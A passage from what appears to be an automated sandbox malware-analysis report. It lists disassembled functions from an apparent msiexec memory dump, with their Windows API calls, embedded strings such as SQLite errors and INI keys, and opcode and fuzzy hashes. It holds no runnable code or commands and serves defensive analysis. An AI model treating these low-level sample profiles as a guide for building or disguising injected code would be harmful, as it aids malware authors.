                                                                                        • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                        • GetParent.USER32(?), ref: 00409FA5
                                                                                        • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                        • String ID:
                                                                                        • API String ID: 2163313125-0
                                                                                        • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                        • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                        • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                        • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                        Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 3592753638-3916222277
                                                                                        • Opcode ID: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                                                                                        • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                        • Opcode Fuzzy Hash: c4f87af86e473d9e91a8a963f900e882b0641065c65ce89cd0d3202dbcb0c8fb
                                                                                        • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                        Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040A47B
                                                                                        • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                        • wcslen.MSVCRT ref: 0040A4BA
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                        • wcslen.MSVCRT ref: 0040A4E0
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                        • String ID: %s (%s)$YV@
                                                                                        • API String ID: 3979103747-598926743
                                                                                        • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                        • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                        • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                        • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                        Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                        • wcslen.MSVCRT ref: 0040A6B1
                                                                                        • wcscpy.MSVCRT ref: 0040A6C1
                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                        • wcscpy.MSVCRT ref: 0040A6DB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                        • String ID: Unknown Error$netmsg.dll
                                                                                        • API String ID: 2767993716-572158859
                                                                                        • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                        • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                        • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                        • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                        Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        • wcscpy.MSVCRT ref: 0040DAFB
                                                                                        • wcscpy.MSVCRT ref: 0040DB0B
                                                                                        • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                          • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                        • API String ID: 3176057301-2039793938
                                                                                        • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                        • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                        • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                        • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                        Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • unable to open database: %s, xrefs: 0042F84E
                                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                        • too many attached databases - max %d, xrefs: 0042F64D
                                                                                        • out of memory, xrefs: 0042F865
                                                                                        • database %s is already in use, xrefs: 0042F6C5
                                                                                        • database is already attached, xrefs: 0042F721
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset
                                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                        • API String ID: 1297977491-2001300268
                                                                                        • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                        • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                        • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                        • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                        Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                        • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                        • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                        • String ID: ($d
                                                                                        • API String ID: 1140211610-1915259565
                                                                                        • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                        • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                        • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                        • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                        Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                        • GetLastError.KERNEL32 ref: 004178FB
                                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3015003838-0
                                                                                        • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                        • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                        • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                        • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                        Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00407E44
                                                                                        • memset.MSVCRT ref: 00407E5B
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                        • wcscpy.MSVCRT ref: 00407F10
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 59245283-0
                                                                                        • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                        • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                        • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                        • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                        Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                        • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                        • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                        • API String ID: 3510742995-3273207271
                                                                                        • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                        • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                        • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                        • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                        Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                        • memset.MSVCRT ref: 00413ADC
                                                                                        • memset.MSVCRT ref: 00413AEC
                                                                                          • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                        • memset.MSVCRT ref: 00413BD7
                                                                                        • wcscpy.MSVCRT ref: 00413BF8
                                                                                        • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                        • String ID: 3A
                                                                                        • API String ID: 3300951397-293699754
                                                                                        • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                        • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                        • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                        • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                        Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                        • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                        • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                        • String ID: strings
                                                                                        • API String ID: 3166385802-3030018805
                                                                                        • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                        • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                        Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041249C
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                        • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                        • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                        • wcscpy.MSVCRT ref: 004125A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                        • String ID: r!A
                                                                                        • API String ID: 2791114272-628097481
                                                                                        • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                        • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                        • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                        • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                        Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                        • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                        • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                        • String ID: BIN
                                                                                        • API String ID: 1668488027-1015027815
                                                                                        • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                        • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                        • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                        • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                        Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00411AF6
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                        • wcsrchr.MSVCRT ref: 00411B14
                                                                                        • wcscat.MSVCRT ref: 00411B2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                        • String ID: AE$.cfg$General$EA
                                                                                        • API String ID: 776488737-1622828088
                                                                                        • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                        • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                        • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                        • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                        Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040D8BD
                                                                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                        • memset.MSVCRT ref: 0040D906
                                                                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                        • String ID: sysdatetimepick32
                                                                                        • API String ID: 1028950076-4169760276
                                                                                        • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                        • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                        • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                        • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                        Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                        • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                        • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                        • memset.MSVCRT ref: 0041BA3D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID: -journal$-wal
                                                                                        • API String ID: 438689982-2894717839
                                                                                        • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                        • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                        • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                        • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                        Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                        • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                        • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                          • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                          • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                        Memory Dump Source
